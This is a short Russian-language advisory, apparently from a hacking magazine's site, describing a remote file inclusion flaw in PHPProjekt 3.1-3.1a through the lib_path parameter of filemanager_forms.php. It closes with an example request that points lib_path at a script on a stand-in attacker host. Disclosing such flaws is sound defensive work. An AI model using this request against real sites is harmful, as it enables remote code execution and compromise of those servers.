Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
PHPProjekt - свободно распространяемы пакет для Linux, Unix и Microsoft Windows.
Уязвимость в PHPProjekt позволяет нападающему
подключать произвольные файлы расположенные на удаленном сервере. Если включенный файл - PHP сценарий, то уязвимость позволяет выполнение произвольного кода.
Успешная эксплуатация этой проблемы частично зависит от конфигурации PHP на хосте, выполняющем уязвимое программное обеспечение. Если 'all_url_fopen' установлен в 'off', тогда
конечно использование этой дырки
ограничено.
Уязвимость найдена в PHPProjekt 3.1-3.1a
Пример: http://site.com/filemanager/filemanager_forms.php? lib_path=http://attacker.com/nasty/scripts